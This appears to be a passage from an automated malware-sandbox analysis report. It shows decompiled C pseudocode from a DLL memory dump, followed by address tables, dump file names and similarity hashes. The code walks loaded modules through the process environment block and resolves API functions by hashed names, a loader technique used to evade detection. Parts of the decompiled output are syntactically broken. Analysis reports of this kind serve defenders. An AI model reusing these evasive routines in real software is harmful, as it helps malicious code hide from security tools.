											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6ed0934f
0x6ed09353
0x6ed0935f
0x6ed09363
0x6ed09367
0x6ed0936c
0x6ed0936f
0x6ed09371
0x6ed09373
0x6ed09373
0x6ed09376
0x6ed0937c
0x6ed093f4
0x6ed093f8
0x6ed093fb
0x6ed093fb
0x6ed093fe
0x00000000
0x6ed093fe
0x6ed09383
0x6ed093eb
0x6ed093ef
0x00000000
0x6ed093ef
0x6ed0938a
0x6ed093e3
0x6ed093e6
0x00000000
0x6ed093e6
0x6ed0938f
0x6ed093cd
0x6ed093d4
0x6ed093d7
0x6ed093a0
0x6ed093a0
0x6ed093a6
0x00000000
0x00000000
0x6ed093ab
0x6ed093c5
0x6ed093c8
0x00000000
0x6ed093c8
0x6ed093b0
0x00000000
0x6ed093b2
0x6ed093b6
0x6ed093b9
0x00000000
0x6ed093b9
0x6ed093b0
0x6ed09401
0x6ed09401
0x6ed09401
0x6ed0940a
0x6ed09413
0x6ed09416
0x6ed09419
0x6ed0941c
0x6ed0941f
0x6ed09425
0x6ed09467
0x6ed0946a
0x6ed0946b
0x6ed09472
0x6ed09475
0x6ed09427
0x6ed0942b
0x6ed09435
0x6ed0943c
0x6ed0943e
0x6ed09457
0x6ed0945a
0x6ed0945a
0x6ed0943c
0x6ed0947d
0x6ed09480
0x6ed09483
0x6ed09487
0x6ed0948b
0x6ed09495
0x6ed09499
0x6ed094a3
0x6ed094ac
0x6ed094b9
0x6ed094bc
0x6ed094bf
0x6ed094bf
0x6ed094cb
0x6ed094d6
0x6ed094dc
0x6ed094e0
0x6ed094cd
0x6ed094cd
0x6ed094cd
0x6ed094e8
0x6ed09512
0x6ed09518
0x6ed09518
0x6ed09520
0x6ed098c9
0x6ed098cf
0x6ed098d5
0x6ed098d5
0x00000000
0x6ed09526
0x6ed09526
0x6ed0952a
0x6ed0952d
0x6ed09530
0x6ed09533
0x6ed09537
0x6ed09539
0x6ed0953c
0x6ed0953f
0x6ed09543
0x6ed09548
0x6ed0954b
0x6ed0954f
0x6ed09554
0x6ed09557
0x6ed09559
0x6ed0955c
0x6ed09560
0x6ed09565
0x6ed09575
0x6ed0957b
0x6ed0957b
0x6ed09583
0x6ed09585
0x6ed0958e
0x6ed09590
0x6ed09593
0x6ed0959e
0x6ed095cb
0x6ed095a0
0x6ed095b7
0x6ed095b7
0x6ed095d3
0x6ed095d9
0x6ed095df
0x6ed095df
0x6ed095d3
0x6ed0958e
0x6ed095e6
0x6ed09657
0x6ed0965c
0x6ed096b5
0x6ed09777
0x6ed0977c
0x6ed0978b
0x6ed09791
0x6ed09795
0x6ed0979e
0x6ed097a5
0x6ed097ae
0x6ed097bc
0x6ed097bf
0x6ed097a7
0x6ed097a7
0x6ed097a7
0x6ed097a5
0x6ed097c8
0x6ed097f5
0x6ed09808
0x6ed09810
0x6ed097f7
0x6ed097f9
0x6ed09801
0x6ed09801
0x6ed097ca
0x6ed097cf
0x6ed097ee
0x6ed097d1
0x6ed097d6
0x6ed097e7
0x6ed097d8
0x6ed097d8
0x6ed097d8
0x6ed097d6
0x6ed097cf
0x6ed09818
0x6ed09827
0x6ed09834
0x6ed0983d
0x6ed09841
0x6ed09845
0x6ed09848
0x6ed0984b
0x6ed0984e
0x6ed09851
0x6ed09854
0x6ed0985a
0x6ed0985e
0x6ed09864
0x6ed09864
0x6ed0985a
0x6ed0986a
0x6ed098a7
0x6ed098ab
0x6ed098b2
0x6ed098b8
0x6ed0986c
0x6ed0986f
0x6ed0988f
0x6ed09893
0x6ed0989a
0x6ed098a1
0x6ed09871
0x6ed09874
0x6ed09876
0x6ed0987a
0x6ed09884
0x6ed0988a
0x6ed0988a
0x6ed09874
0x6ed0986f
0x6ed098bf
0x6ed098bf
0x6ed098d8
0x6ed098d8
0x6ed098de
0x6ed098e3
0x6ed0993d
0x6ed09942
0x6ed09981
0x6ed09986
0x6ed09988
0x6ed0998c
0x6ed0998f
0x6ed09992
0x6ed09994
0x6ed09995
0x6ed09995
0x6ed0999a
0x6ed099b8
0x6ed099ba
0x6ed099be
0x6ed099c4
0x6ed099c7
0x6ed099c9
0x6ed099ca
0x6ed099ca
0x00000000
0x6ed0999c
0x6ed0999c
0x6ed0999c
0x6ed099a0
0x6ed099a6
0x6ed099a9
0x6ed099ab
0x6ed099ae
0x6ed099cd
0x6ed099cd
0x6ed099d4
0x6ed099ee
0x6ed099d6
0x6ed099d6
0x6ed099e2
0x6ed099e3
0x6ed099e6
0x6ed099e6
0x6ed099fc
0x6ed099fc
0x6ed0999a
0x6ed09947
0x6ed09955
0x6ed0996d
0x6ed09971
0x6ed09974
0x6ed0997a
0x6ed0997e
0x6ed0997e
0x00000000
0x6ed0997e
0x6ed09957
0x6ed0995b
0x6ed09961
0x6ed09961
0x6ed09967
0x00000000
0x6ed09967
0x6ed09949
0x6ed0994d
0x00000000
0x6ed0994d
0x6ed098e7
0x6ed09913
0x6ed0992b
0x6ed0992f
0x6ed09932
0x6ed09935
0x6ed09937
0x6ed0993a
0x6ed09915
0x6ed09915
0x6ed09919
0x6ed0991c
0x6ed0991f
0x6ed09922
0x6ed09925
0x6ed09925
0x00000000
0x6ed09913
0x6ed098ed
0x00000000
0x00000000
0x6ed098f3
0x6ed098f7
0x6ed098fd
0x6ed09900
0x6ed09903
0x6ed09906
0x00000000
0x6ed09906
0x6ed0977e
0x6ed09782
0x6ed09788
0x00000000
0x6ed09788
0x6ed096c0
0x6ed096d2
0x6ed096d7
0x6ed09742
0x00000000
0x00000000
0x6ed09749
0x6ed0976f
0x6ed09773
0x00000000
0x00000000
0x6ed09752
0x6ed09757
0x6ed0976b
0x00000000
0x00000000
0x00000000
0x6ed0976d
0x6ed0975e
0x00000000
0x00000000
0x6ed09763
0x00000000
0x00000000
0x6ed09765
0x00000000
0x6ed09749
0x6ed096d9
0x6ed096e3
0x6ed096f4
0x6ed096f7
0x6ed096fa
0x6ed09700
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed09706
0x6ed09706
0x6ed09706
0x6ed0970d
0x00000000
0x00000000
0x6ed0970f
0x6ed09712
0x6ed09718
0x00000000
0x00000000
0x00000000
0x6ed0971a
0x6ed0971c
0x6ed09725
0x00000000
0x00000000
0x6ed09739
0x00000000
0x00000000
0x00000000
0x6ed0973b
0x6ed096c7
0x00000000
0x00000000
0x00000000
0x6ed096cd
0x6ed09661
0x6ed09690
0x6ed09691
0x6ed0969a
0x00000000
0x6ed096ab
0x00000000
0x6ed096ab
0x6ed09668
0x6ed0966b
0x6ed0967e
0x6ed0967f
0x6ed09683
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ed0966b
0x6ed09661
0x6ed095ed
0x6ed0964a
0x6ed0964e
0x6ed09654
0x00000000
0x6ed09654
0x6ed095ef
0x6ed095f3
0x6ed09600
0x6ed09604
0x6ed0961a
0x6ed09622
0x6ed09606
0x6ed09608
0x6ed09612
0x6ed09612
0x6ed09628
0x6ed09631
0x6ed09648
0x00000000
0x00000000
0x00000000
0x6ed09648
0x6ed09633
0x6ed09633
0x00000000
0x6ed09628

Strings

, xrefs: 6ED099B3

Memory Dump Source

Source File: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: true

Associated: 00000000.00000002.647878213.000000006ECF0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648291272.000000006ED0A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.648382411.000000006ED0D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.648422509.000000006ED0F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction ID: d765e19ed1fd719bf0e134def51d74ebc35bdbfebe16ae2ffff14df294e59ec3
Opcode Fuzzy Hash: 78ded7ad58ccfe6e39af61f505e9c63cd873381c8b4d26e632723182d8e82be7
Instruction Fuzzy Hash: 2B228A7140C39ACFE715CF99C4A136ABBE0AFC6300F08896EE9E54B295D335D945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6ED01460, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6ED01460(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6ED00328(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6ed0d208 == 0 ||  *0x6ed0d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x7af3da47;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6ED04FD4( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6ed0d2ec |  *0x6ed0d2ed;
									if(( *0x6ed0d2ec |  *0x6ed0d2ed) == 0) {
										_t525 =  *0x6ed0d208; // 0x9cab0a6e
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6ed0d2ec = 1;
											_t526 = E6ED035F4(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6ED01C54(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6ed0d208 = _t526;
											 *0x6ed0d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6ED035F4(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6ED01C54(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6ECFDFF8(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6ECFDFF8(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x82fffbdc;
									if(_t535[0x54] == 0x82fffbdc) {
										 *0x6ed0d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0xdb278333;
										if(_t535[0x54] == 0xdb278333) {
											 *0x6ed0d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6ECFE8D4( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6ED03044(0xfe338407, 0xccbfc9a9, 0xfe338407, 0xfe338407);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6ed0d2e4 = 1;
					E6ECFF5A8( &(_t535[0x38]), 0);
					E6ECFF5A8( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6ECFF4E0( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6ED03044(0xfe338407, 0x790529cb, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6ECFF84C( &(_t535[0xc]), E6ECFF4F0( &(_t535[8])) + 0x14);
								_t369 = E6ECFF4E0( &(_t535[0xc]), E6ECFF4F0( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6ECFF678( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6ECFF5A8( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6ECFF678( &(_t535[8]));
							E6ECFF678( &(_t535[0x164]));
							E6ECFF5A8( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6ECFF5A8( &(_t535[0x20]), 0);
							_push(0xfe338407);
							_t289 = E6ED01D58(0xfe338407);
							_t290 = E6ED01310( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6ED01C90( &(_t535[0x164]), 0xfe338407);
							_t518 =  &(_t535[0x178]);
							E6ECFD058( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6ED05CAC( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6ED05CE0( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6ED08DE0( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6ECFF678( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6ECFBB88( &(_t535[0x110]));
							}
							E6ECFD020( &(_t535[0x104]));
							E6ECFD020(_t518);
							E6ECFD020( &(_t535[0x15c]));
							E6ECFD020( &(_t535[0x154]));
							E6ED090C4( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6ECFF63C( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6ED09088( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6ECFF4E0( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6ECFF4F0( &(_t535[0x44]));
								_t519 =  *(0x6ed0bd40 + _t381 * 4);
								_t531 = E6ED09054( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6ED087C0( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6ECFF4F0( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6ECFF500( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6ECFF4F0( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6ECFF84C( &(_t535[0x20]), E6ECFF4F0( &(_t535[0x1c])) + 8);
										E6ECFF4E0( &(_t535[0x20]), E6ECFF4F0( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6ED03154(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6ECFF84C( &(_t535[0x48]), _t535[0x70]);
									E6ED03154(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6ECFF864( &(_t535[0x44]), _t563);
									E6ECFF864( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6ED09114( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6ED090DC( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6ECFF678( &(_t535[0x144]));
									E6ECFF678( &(_t535[0x134]));
									goto L38;
								}
								 *0x6ed0d2e8 =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6ECFF678( &(_t535[0x11c]));
							E6ED08E40(_t381,  &(_t535[0xd8]));
							E6ECFF678( &(_t535[0x1c]));
							E6ECFF678( &(_t535[0x44]));
							E6ECFF678( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6ECFF4E0( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6ECFF84C( &(_t535[0x38]), E6ECFF4F0( &(_t535[0x34])) + 0x14);
							_t347 = E6ECFF4E0( &(_t535[0x38]), E6ECFF4F0( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
